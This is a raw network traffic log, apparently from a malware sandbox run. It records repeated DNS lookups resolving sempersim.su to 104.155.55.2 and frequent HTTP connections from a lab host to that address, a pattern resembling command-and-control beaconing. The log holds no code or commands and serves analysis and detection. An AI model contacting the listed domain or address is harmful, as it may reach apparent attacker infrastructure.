                                    Jun 23, 2022 18:09:20.168175936 CEST8049795104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:21.018222094 CEST8049795104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:21.018258095 CEST8049795104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:21.018326998 CEST4979580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:21.018357992 CEST4979580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:21.052544117 CEST8049795104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:22.027339935 CEST4980780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:22.061429024 CEST8049807104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:22.061577082 CEST4980780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:22.064496040 CEST4980780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:22.098742962 CEST8049807104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:22.098875999 CEST4980780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:22.132890940 CEST8049807104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:22.916759968 CEST8049807104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:22.916778088 CEST8049807104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:22.916857004 CEST4980780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:22.916872025 CEST4980780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:22.951831102 CEST8049807104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:27.713958025 CEST4983280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:27.748146057 CEST8049832104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:27.748258114 CEST4983280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:27.755281925 CEST4983280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:27.791048050 CEST8049832104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:27.791141033 CEST4983280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:27.825504065 CEST8049832104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:28.697077990 CEST8049832104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:28.697105885 CEST8049832104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:28.697235107 CEST4983280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:28.697547913 CEST4983280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:28.732095003 CEST8049832104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:30.958607912 CEST4983880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:30.991812944 CEST8049838104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:30.991926908 CEST4983880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:30.995615005 CEST4983880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:31.028739929 CEST8049838104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:31.028866053 CEST4983880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:31.061784029 CEST8049838104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:31.916398048 CEST8049838104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:31.916446924 CEST8049838104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:31.916629076 CEST4983880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:31.916652918 CEST4983880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:31.949965954 CEST8049838104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:36.730859995 CEST4984280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:36.765202045 CEST8049842104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:36.765324116 CEST4984280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:36.768062115 CEST4984280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:36.802275896 CEST8049842104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:36.802442074 CEST4984280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:36.836610079 CEST8049842104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:37.680341005 CEST8049842104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:37.680402040 CEST8049842104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:37.680484056 CEST4984280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:37.714603901 CEST8049842104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:41.895617962 CEST4985080192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:41.929912090 CEST8049850104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:41.930048943 CEST4985080192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:41.932837009 CEST4985080192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:41.967029095 CEST8049850104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:41.967153072 CEST4985080192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:42.001388073 CEST8049850104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:42.794326067 CEST8049850104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:42.794369936 CEST8049850104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:42.794493914 CEST4985080192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:42.795568943 CEST4985080192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:42.829607010 CEST8049850104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:47.586972952 CEST4985680192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:47.621264935 CEST8049856104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:47.621416092 CEST4985680192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:47.624965906 CEST4985680192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:47.659430027 CEST8049856104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:47.662164927 CEST4985680192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:47.696440935 CEST8049856104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:48.532793999 CEST8049856104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:48.532834053 CEST8049856104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:48.532926083 CEST4985680192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:48.532978058 CEST4985680192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:48.567070007 CEST8049856104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:55.707495928 CEST4985880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:55.742337942 CEST8049858104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:55.742634058 CEST4985880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:55.746968985 CEST4985880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:55.781001091 CEST8049858104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:55.781109095 CEST4985880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:55.814958096 CEST8049858104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:56.667985916 CEST8049858104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:56.668025017 CEST8049858104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:56.668138981 CEST4985880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:56.668159962 CEST4985880192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:56.702193975 CEST8049858104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:59.690476894 CEST4986580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:59.724639893 CEST8049865104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:59.725275040 CEST4986580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:59.728405952 CEST4986580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:59.762507915 CEST8049865104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:09:59.762680054 CEST4986580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:09:59.796674013 CEST8049865104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:00.690473080 CEST8049865104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:00.690521002 CEST8049865104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:00.690613985 CEST4986580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:00.694233894 CEST4986580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:00.730204105 CEST8049865104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:03.610014915 CEST4986780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:03.643873930 CEST8049867104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:03.643984079 CEST4986780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:03.646769047 CEST4986780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:03.680876970 CEST8049867104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:03.680988073 CEST4986780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:03.714720964 CEST8049867104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:04.550873041 CEST8049867104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:04.550899982 CEST8049867104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:04.550987005 CEST4986780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:04.551043034 CEST4986780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:04.584800959 CEST8049867104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:05.822792053 CEST4987980192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:05.856399059 CEST8049879104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:05.856848001 CEST4987980192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:05.859589100 CEST4987980192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:05.893618107 CEST8049879104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:05.894614935 CEST4987980192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:05.927932024 CEST8049879104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:06.706850052 CEST8049879104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:06.706913948 CEST8049879104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:06.707037926 CEST4987980192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:06.707206964 CEST4987980192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:06.740637064 CEST8049879104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:09.565874100 CEST4989280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:09.599854946 CEST8049892104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:09.600025892 CEST4989280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:09.603862047 CEST4989280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:09.637823105 CEST8049892104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:09.637948036 CEST4989280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:09.673930883 CEST8049892104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:10.533294916 CEST8049892104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:10.533339024 CEST8049892104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:10.533513069 CEST4989280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:10.590889931 CEST4989280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:10.625000954 CEST8049892104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:14.577212095 CEST4989580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:14.612133026 CEST8049895104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:14.612261057 CEST4989580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:14.615169048 CEST4989580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:14.650319099 CEST8049895104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:14.650410891 CEST4989580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:14.684789896 CEST8049895104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:15.552607059 CEST8049895104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:15.552655935 CEST8049895104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:15.552812099 CEST4989580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:15.553754091 CEST4989580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:15.587842941 CEST8049895104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:16.376142979 CEST4989680192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:16.409903049 CEST8049896104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:16.410068989 CEST4989680192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:16.412961960 CEST4989680192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:16.446965933 CEST8049896104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:16.447062016 CEST4989680192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:16.480252028 CEST8049896104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:17.418004036 CEST8049896104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:17.418046951 CEST8049896104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:10:17.418145895 CEST4989680192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:17.418268919 CEST4989680192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:10:17.453047037 CEST8049896104.155.55.2192.168.2.3
                                    TimestampSource PortDest PortSource IPDest IP
                                    Jun 23, 2022 18:08:26.293118954 CEST5592353192.168.2.38.8.8.8
                                    Jun 23, 2022 18:08:26.312437057 CEST53559238.8.8.8192.168.2.3
                                    Jun 23, 2022 18:08:28.453790903 CEST5772353192.168.2.38.8.8.8
                                    Jun 23, 2022 18:08:28.471168995 CEST53577238.8.8.8192.168.2.3
                                    Jun 23, 2022 18:08:30.221090078 CEST5811653192.168.2.38.8.8.8
                                    Jun 23, 2022 18:08:30.538393021 CEST53581168.8.8.8192.168.2.3
                                    Jun 23, 2022 18:08:32.768384933 CEST5742153192.168.2.38.8.8.8
                                    Jun 23, 2022 18:08:32.787852049 CEST53574218.8.8.8192.168.2.3
                                    Jun 23, 2022 18:08:34.825259924 CEST4987353192.168.2.38.8.8.8
                                    Jun 23, 2022 18:08:34.844963074 CEST53498738.8.8.8192.168.2.3
                                    Jun 23, 2022 18:08:40.300507069 CEST5380253192.168.2.38.8.8.8
                                    Jun 23, 2022 18:08:40.588601112 CEST53538028.8.8.8192.168.2.3
                                    Jun 23, 2022 18:08:43.324750900 CEST6526653192.168.2.38.8.8.8
                                    Jun 23, 2022 18:08:43.342576981 CEST53652668.8.8.8192.168.2.3
                                    Jun 23, 2022 18:08:45.421000004 CEST4932753192.168.2.38.8.8.8
                                    Jun 23, 2022 18:08:45.440124035 CEST53493278.8.8.8192.168.2.3
                                    Jun 23, 2022 18:08:47.827784061 CEST6445253192.168.2.38.8.8.8
                                    Jun 23, 2022 18:08:48.113367081 CEST53644528.8.8.8192.168.2.3
                                    Jun 23, 2022 18:08:50.688333035 CEST5862553192.168.2.38.8.8.8
                                    Jun 23, 2022 18:08:50.707300901 CEST53586258.8.8.8192.168.2.3
                                    Jun 23, 2022 18:08:53.418184042 CEST5281053192.168.2.38.8.8.8
                                    Jun 23, 2022 18:08:53.437299013 CEST53528108.8.8.8192.168.2.3
                                    Jun 23, 2022 18:08:56.029740095 CEST5077853192.168.2.38.8.8.8
                                    Jun 23, 2022 18:08:56.049185991 CEST53507788.8.8.8192.168.2.3
                                    Jun 23, 2022 18:08:59.746954918 CEST5979553192.168.2.38.8.8.8
                                    Jun 23, 2022 18:08:59.766767979 CEST53597958.8.8.8192.168.2.3
                                    Jun 23, 2022 18:09:02.005883932 CEST5939053192.168.2.38.8.8.8
                                    Jun 23, 2022 18:09:02.023513079 CEST53593908.8.8.8192.168.2.3
                                    Jun 23, 2022 18:09:04.295727015 CEST6481653192.168.2.38.8.8.8
                                    Jun 23, 2022 18:09:04.315396070 CEST53648168.8.8.8192.168.2.3
                                    Jun 23, 2022 18:09:06.418101072 CEST6499653192.168.2.38.8.8.8
                                    Jun 23, 2022 18:09:06.437319040 CEST53649968.8.8.8192.168.2.3
                                    Jun 23, 2022 18:09:08.858531952 CEST5209653192.168.2.38.8.8.8
                                    Jun 23, 2022 18:09:08.878333092 CEST53520968.8.8.8192.168.2.3
                                    Jun 23, 2022 18:09:10.958097935 CEST6064053192.168.2.38.8.8.8
                                    Jun 23, 2022 18:09:10.977695942 CEST53606408.8.8.8192.168.2.3
                                    Jun 23, 2022 18:09:13.136251926 CEST6386153192.168.2.38.8.8.8
                                    Jun 23, 2022 18:09:13.153110981 CEST53638618.8.8.8192.168.2.3
                                    Jun 23, 2022 18:09:17.432912111 CEST5015253192.168.2.38.8.8.8
                                    Jun 23, 2022 18:09:17.450462103 CEST53501528.8.8.8192.168.2.3
                                    Jun 23, 2022 18:09:19.486244917 CEST6272453192.168.2.38.8.8.8
                                    Jun 23, 2022 18:09:20.042426109 CEST53627248.8.8.8192.168.2.3
                                    Jun 23, 2022 18:09:22.007802963 CEST6441253192.168.2.38.8.8.8
                                    Jun 23, 2022 18:09:22.025185108 CEST53644128.8.8.8192.168.2.3
                                    Jun 23, 2022 18:09:27.695745945 CEST6254753192.168.2.38.8.8.8
                                    Jun 23, 2022 18:09:27.712416887 CEST53625478.8.8.8192.168.2.3
                                    Jun 23, 2022 18:09:30.935127020 CEST5744253192.168.2.38.8.8.8
                                    Jun 23, 2022 18:09:30.954468012 CEST53574428.8.8.8192.168.2.3
                                    Jun 23, 2022 18:09:36.710115910 CEST5248753192.168.2.38.8.8.8
                                    Jun 23, 2022 18:09:36.729382038 CEST53524878.8.8.8192.168.2.3
                                    Jun 23, 2022 18:09:41.871608019 CEST5895053192.168.2.38.8.8.8
                                    Jun 23, 2022 18:09:41.889441967 CEST53589508.8.8.8192.168.2.3
                                    Jun 23, 2022 18:09:47.565593958 CEST5906553192.168.2.38.8.8.8
                                    Jun 23, 2022 18:09:47.584813118 CEST53590658.8.8.8192.168.2.3
                                    Jun 23, 2022 18:09:55.686777115 CEST6458953192.168.2.38.8.8.8
                                    Jun 23, 2022 18:09:55.706176043 CEST53645898.8.8.8192.168.2.3
                                    Jun 23, 2022 18:09:59.580734015 CEST5579553192.168.2.38.8.8.8
                                    Jun 23, 2022 18:09:59.687091112 CEST53557958.8.8.8192.168.2.3
                                    Jun 23, 2022 18:10:03.591384888 CEST6463553192.168.2.38.8.8.8
                                    Jun 23, 2022 18:10:03.608742952 CEST53646358.8.8.8192.168.2.3
                                    Jun 23, 2022 18:10:05.798867941 CEST5526953192.168.2.38.8.8.8
                                    Jun 23, 2022 18:10:05.818321943 CEST53552698.8.8.8192.168.2.3
                                    Jun 23, 2022 18:10:09.542700052 CEST6308353192.168.2.38.8.8.8
                                    Jun 23, 2022 18:10:09.563366890 CEST53630838.8.8.8192.168.2.3
                                    Jun 23, 2022 18:10:14.553566933 CEST4977553192.168.2.38.8.8.8
                                    Jun 23, 2022 18:10:14.571397066 CEST53497758.8.8.8192.168.2.3
                                    Jun 23, 2022 18:10:16.356290102 CEST6019553192.168.2.38.8.8.8
                                    Jun 23, 2022 18:10:16.375451088 CEST53601958.8.8.8192.168.2.3
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    Jun 23, 2022 18:08:26.293118954 CEST192.168.2.38.8.8.80x1976Standard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:08:28.453790903 CEST192.168.2.38.8.8.80x1469Standard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:08:30.221090078 CEST192.168.2.38.8.8.80xc859Standard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:08:32.768384933 CEST192.168.2.38.8.8.80xa4bStandard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:08:34.825259924 CEST192.168.2.38.8.8.80x23e1Standard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:08:40.300507069 CEST192.168.2.38.8.8.80x8dcaStandard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:08:43.324750900 CEST192.168.2.38.8.8.80x375eStandard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:08:45.421000004 CEST192.168.2.38.8.8.80x4161Standard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:08:47.827784061 CEST192.168.2.38.8.8.80x7b52Standard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:08:50.688333035 CEST192.168.2.38.8.8.80x57aStandard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:08:53.418184042 CEST192.168.2.38.8.8.80x3452Standard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:08:56.029740095 CEST192.168.2.38.8.8.80xec0dStandard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:08:59.746954918 CEST192.168.2.38.8.8.80x7e7cStandard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:02.005883932 CEST192.168.2.38.8.8.80x22b7Standard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:04.295727015 CEST192.168.2.38.8.8.80x49b7Standard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:06.418101072 CEST192.168.2.38.8.8.80xa7e4Standard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:08.858531952 CEST192.168.2.38.8.8.80x5a0bStandard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:10.958097935 CEST192.168.2.38.8.8.80x9f82Standard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:13.136251926 CEST192.168.2.38.8.8.80x6665Standard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:17.432912111 CEST192.168.2.38.8.8.80x5162Standard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:19.486244917 CEST192.168.2.38.8.8.80xb736Standard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:22.007802963 CEST192.168.2.38.8.8.80x35baStandard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:27.695745945 CEST192.168.2.38.8.8.80x3bbStandard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:30.935127020 CEST192.168.2.38.8.8.80xaab0Standard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:36.710115910 CEST192.168.2.38.8.8.80xc774Standard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:41.871608019 CEST192.168.2.38.8.8.80xfb0eStandard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:47.565593958 CEST192.168.2.38.8.8.80x75ceStandard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:55.686777115 CEST192.168.2.38.8.8.80x8043Standard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:59.580734015 CEST192.168.2.38.8.8.80xa031Standard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:10:03.591384888 CEST192.168.2.38.8.8.80xcea1Standard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:10:05.798867941 CEST192.168.2.38.8.8.80x6375Standard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:10:09.542700052 CEST192.168.2.38.8.8.80x13bfStandard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:10:14.553566933 CEST192.168.2.38.8.8.80x61f0Standard query (0)sempersim.suA (IP address)IN (0x0001)
                                    Jun 23, 2022 18:10:16.356290102 CEST192.168.2.38.8.8.80x4119Standard query (0)sempersim.suA (IP address)IN (0x0001)
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Jun 23, 2022 18:08:26.312437057 CEST8.8.8.8192.168.2.30x1976No error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:08:28.471168995 CEST8.8.8.8192.168.2.30x1469No error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:08:30.538393021 CEST8.8.8.8192.168.2.30xc859No error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:08:32.787852049 CEST8.8.8.8192.168.2.30xa4bNo error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:08:34.844963074 CEST8.8.8.8192.168.2.30x23e1No error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:08:40.588601112 CEST8.8.8.8192.168.2.30x8dcaNo error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:08:43.342576981 CEST8.8.8.8192.168.2.30x375eNo error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:08:45.440124035 CEST8.8.8.8192.168.2.30x4161No error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:08:48.113367081 CEST8.8.8.8192.168.2.30x7b52No error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:08:50.707300901 CEST8.8.8.8192.168.2.30x57aNo error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:08:53.437299013 CEST8.8.8.8192.168.2.30x3452No error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:08:56.049185991 CEST8.8.8.8192.168.2.30xec0dNo error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:08:59.766767979 CEST8.8.8.8192.168.2.30x7e7cNo error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:02.023513079 CEST8.8.8.8192.168.2.30x22b7No error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:04.315396070 CEST8.8.8.8192.168.2.30x49b7No error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:06.437319040 CEST8.8.8.8192.168.2.30xa7e4No error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:08.878333092 CEST8.8.8.8192.168.2.30x5a0bNo error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:10.977695942 CEST8.8.8.8192.168.2.30x9f82No error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:13.153110981 CEST8.8.8.8192.168.2.30x6665No error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:17.450462103 CEST8.8.8.8192.168.2.30x5162No error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:20.042426109 CEST8.8.8.8192.168.2.30xb736No error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:22.025185108 CEST8.8.8.8192.168.2.30x35baNo error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:27.712416887 CEST8.8.8.8192.168.2.30x3bbNo error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:30.954468012 CEST8.8.8.8192.168.2.30xaab0No error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:36.729382038 CEST8.8.8.8192.168.2.30xc774No error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:41.889441967 CEST8.8.8.8192.168.2.30xfb0eNo error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:47.584813118 CEST8.8.8.8192.168.2.30x75ceNo error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:55.706176043 CEST8.8.8.8192.168.2.30x8043No error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:09:59.687091112 CEST8.8.8.8192.168.2.30xa031No error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:10:03.608742952 CEST8.8.8.8192.168.2.30xcea1No error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:10:05.818321943 CEST8.8.8.8192.168.2.30x6375No error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:10:09.563366890 CEST8.8.8.8192.168.2.30x13bfNo error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
